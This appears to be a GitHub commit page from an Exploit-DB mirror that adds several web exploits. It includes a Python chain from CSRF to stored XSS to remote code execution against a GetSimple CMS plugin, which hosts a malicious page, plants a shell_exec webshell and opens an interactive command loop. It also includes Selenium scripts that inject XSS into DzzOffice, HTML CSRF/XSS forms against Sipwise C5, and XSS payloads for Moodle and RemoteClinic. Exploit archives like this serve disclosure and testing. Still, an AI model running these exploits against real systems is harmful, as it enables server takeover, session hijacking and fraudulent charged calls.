bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-04-24

Browse source 
7 changes to exploits/shellcodes

Moodle 3.10.3 - 'url' Persistent Cross Site Scripting
GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE
DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)
Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)
This commit is contained in:
Offensive Security 2021-04-24 05:01:56 +00:00
parent acb55122f4
commit 37baf23611
8 changed files with 528 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
exploits/hardware/webapps/49775.html
View file

@ -2,9 +2,9 @@
# Date: 14/04/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware V02.03.01.45_pt
# CVE: CVE-2021-31152
# CVE: 2021-31152
#Exploit code:
# Exploit code:
<html>
<body>
<form action="http://192.168.0.1/goform/setSysTools" method="POST">
@ -12,7 +12,7 @@
<input name="remoteWebType" value="any" type="hidden">
<input name="remoteWebIP" value="" type="hidden">
<input name="remoteWebPort" value="8888" type="hidden">
<input type="submit" value="Submit request">
<input type="submit" value="Submit request">
</form>
</body>
<script>

112
exploits/hardware/webapps/49800.html Normal file
View file

@ -0,0 +1,112 @@
# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com
Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities
Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
cross-site scripting vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php
13.04.2021
--
Stored XSS (POST tsetname):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/callforward/time/set/save" method="POST">
<input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" />
<input type="hidden" name="subscriber&#95;id" value="401" />
<input type="hidden" name="x" value="90027" />
<input type="hidden" name="y" value="&#45;1" />
<input type="submit" value="Go for callforward" />
</form>
</body>
</html>
Reflected XSS (GET filter):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook" method="GET">
<input type="hidden" name="filter" value='"><script>confirm(251)</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
<input type="submit" value="Go for addressbook" />
</form>
</body>
</html>
Stored XSS (POST firstname, lastname, company):
-----------------------------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook/save" method="POST">
<input type="hidden" name="firstname" value='"><script>alert(251)</script>' />
<input type="hidden" name="lastname" value='"><script>alert(251)</script>' />
<input type="hidden" name="company" value='"><script>alert(251)</script>' />
<input type="hidden" name="homephonenumber" value="1112223333" />
<input type="hidden" name="phonenumber" value="3332221111" />
<input type="hidden" name="mobilenumber" value="" />
<input type="hidden" name="faxnumber" value="" />
<input type="hidden" name="email" value="lab%40zeroscience.mk" />
<input type="hidden" name="homepage" value="" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="x" value="89957" />
<input type="hidden" name="y" value="21" />
<input type="submit" value="Go for addressbook 2" />
</form>
</body>
</html>
Reflected XSS (GET lang):
-------------------------
<html>
<body>
<form action="https://10.0.1.7/statistics/versions" method="GET">
<input type="hidden" name="lang" value="en'-alert(251)-'ZSL" />
<input type="submit" value="Go for statistics" />
</form>
</body>
</html>

53
exploits/hardware/webapps/49801.html Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com
Sipwise C5 NGCP CSC CSRF Click2Dial Exploit
Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5649
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php
13.04.2021
--
<html>
<body>
<form action="https://10.0.1.7/call/click2dial" method="POST">
<input type="hidden" name="d" value="%2B3897031337" />
<input type="submit" value="Dial and charge!" />
</form>
</body>
</html>

136
exploits/multiple/webapps/49799.py Executable file
View file

@ -0,0 +1,136 @@
# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r
# Date: 04/23/2021
# Vendor: http://www.dzzoffice.com/
# Link: https://github.com/zyx0814/dzzoffice
# CVE: CVE-2021-3318
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318
from selenium import webdriver
import time
import os
#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/user.php?mod=login"
#enter your login username
username="admin@dzzoffice.com"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="loginsubmit"
# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users
# Otvarai da ne vlazam s kasata
browser.get((website_link))
# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
### Exploit
#time.sleep(3)
element_for_natrutvanie="admin_password"
laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"
browser.get((laina))
### Next level... :)
os.system("python poc_login_1.py")
print("payload is deployed_0...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
### os.system
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318
from selenium import webdriver
import time
#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/admin.php?mod=setting"
#enter your login username
username="admin@dzzoffice.com"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="admin_email"
#enter the element for password input field
element_for_password="admin_password"
#enter the element for submit button
element_for_submit="submit"
# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users
# Otvarai da ne vlazam s kasata
browser.get((website_link))
# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
### Exploit
time.sleep(3)
element_for_natrutvanie="settingsubmit"
laina="http://localhost/dzzoffice/admin.php?mod=setting"
browser.get((laina))
### Inner text...
browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
time.sleep(5)
# Submit exploit
signInButton = browser.find_element_by_name(element_for_natrutvanie)
signInButton.click()
print("payload is deployed_1...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

30
exploits/php/webapps/49795.txt
View file

@ -5,7 +5,7 @@
# Software Link: https://github.com/remoteclinic/RemoteClinic
# Version: 2.0
# Tested on: Windows 10
# CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042
# CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042, CVE-2021-31329
#Steps to Reproduce:
@ -48,4 +48,30 @@ For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/8
5)Click on that Clinic.
6)XSS Executed.
For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/11
For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/11
#Steps to Reproduce:
1)Login in Application as Doctor.
2)Create a New Medicine.
3)Medicine Name Field is Vulnerable to XSS, inject with XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
4)But there is client side validation on maxlength but not on server side.
4)Change maxlength 30 to 100.
5)Click on Register.
6)Now Click on Show All which is /medicines/ endpoint.
7)XSS Executed.
Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/14
#Steps to Reproduce:
1)Login in Application as Doctor.
2)Create a New Staff Member.
3)Here is Chat Field and Personal Address Field are Vulnerable to XSS, inject with XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>
4)Profile Created.
5)Signout.
6)Now login with that staff member which Chat field and Personal Address field consist of XSS Payload.
7)After Login, go to my profile.
8)XSS Executed.
Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/16

17
exploits/php/webapps/49797.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Moodle 3.10.3 - 'url' Persistent Cross Site Scripting
# Date: 22/04/2021
# Exploit Author: UVision
# Vendor Homepage: https://moodle.org/
# Software Link: https://download.moodle.org
# Version: 3.10.3
# Tested on: Debian/Windows 10
By having the role of a teacher or an administrator or a manager (to have the possibility to create a course):
- Create a new course (http://localhost/moodle/course/edit.php?category=1&returnto=topcat)
- Give any name , short name, date and other things required.
- In "Description" field, click on the "link" button
- In the url field, enter the payload : <img src=1 href=1 onerror="javascript:alert(1)"></img>
- Create the link, an alert window appears (close it several times so that it disappears) , save the course. ("Save and return")
Each time the course description is displayed, the stored xss is activated : activate it by viewing the course, by modifying it, etc.

174
exploits/php/webapps/49798.py Executable file
View file

@ -0,0 +1,174 @@
# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 22/04/2021
# Vendor Homepage: http://get-simple.info &
# Software Link: http://get-simple.info/download/
# Version: Exploit <= v1.1.1 | Stored XSS <= v1.1.2
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linix & Windows), Internet Explorer
# Vendor: NetExplorer
# Exploit Description:
# The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. The PHP function htmlspecialchars() attempts to sanitize the user-input, but is trivially bypassed by passing the dangerous characters as escaped hex bytes. This allows attackers to breakout of the HTML rendered by the PHP engine, to run arbitrary client-side code within the admins browser; after the admin submits the POST request from the CSRF attack. Since GetSimple CMS suffers from a known PHP code injection vulnerability within the themes edit page, the attacker can ride the admins session to perform a chain of XHR requests within the admins browser. The XHR chain triggered by the CSRF attack will collect the CSRF Token from the themes edit page, and use the token to exploit the PHP Code Injection vulnerability to upload a webshell within every page hosted by the CMS.
# Full Disclosure: github.com/boku7/gsSMTP-Csrf2Xss2RCE/
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
''' Breakout of the PHP and inject a <script> tag using escaped Hex codepoints to bypass the htmlspecialchars() PHP function
htmlspecailchars() only HTML encodes the chars: &"><'
"+><script>alert(1)</script> --> \x22\x2b\x3e\x3cscript\x3ealert(1)\x3c/script\x3e
PAYLOAD
- Replace alert(1) payload above with the XHR Chain to gain RCE
- XHR Chain first collects the CSRF token on the theme-edit.php page,
then uses the token to inject PHP code into all pages of the CMS via known vulnerable themes component of core application'''
def xhrRcePayload():
hexBreakoutOpen = '\\x22\\x2b\\x3e\\x3cscript\\x3e'
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var h=\\x22application/x-www-form-urlencoded\\x22;'
payload += 'var u=\\x22/admin/theme-edit.php\\x22;'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 \\x26\\x26 xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector(\\x22#nonce\\x22).value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open(\\x22POST\\x22,u,true);'
payload += 'xhr2.setRequestHeader(\\x22Content-Type\\x22,h);'
# for the $_REQUEST[solarflare] used for the webshell via shell_exec(), hex-escape the $ or else it will render in the PHP engine to early in the exploit chain
payload += 'payload=e(\\x22\\x3c?php echo shell_exec(\\x24_REQUEST[solarflare]) ?\\x3e\\x22);'
payload += 'params=\\x22nonce=\\x22+nVal+\\x22\\x26content=\\x22+payload+\\x22\\x26edited_file=\\x22+eVal+\\x22\\x26submitsave=Save+Changes\\x22;'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open(\\x22GET\\x22,u,true);'
payload += 'xhr1.responseType=\\x22document\\x22;'
payload += 'xhr1.send();'
hexBreakoutClose = '\\x3c/script\\x3e'
return hexBreakoutOpen + payload + hexBreakoutClose
def csrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="395ed33a5ae4476">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def sig():
SIG = SB+FY+" .-----.._ ,--.\n"
SIG += FY+" | .. > ___ | | .--.\n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
return SIG
def argsetup():
about = SB+FB+' The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args
if __name__ == '__main__':
header = SB+FR+' My SMTP Contact GetSimple CMS Plugin\n'
header += SB+FM+'CSRF '+FT+'-->'+FM+' Stored XSS '+FT+'-->'+FM+' XHR PHP Code Injection '+FT+'-->'+FM+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)

5
files_exploits.csv
View file

@ -43968,3 +43968,8 @@ id,file,description,date,author,type,platform,port
49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",2021-04-21,"Dolev Farhi",webapps,multiple,
49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",2021-04-22,bt0,webapps,php,
49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",2021-04-22,Hex_26,webapps,perl,
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",2021-04-23,UVision,webapps,php,
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE",2021-04-23,boku,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-23,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,

Can't render this file because it is too large.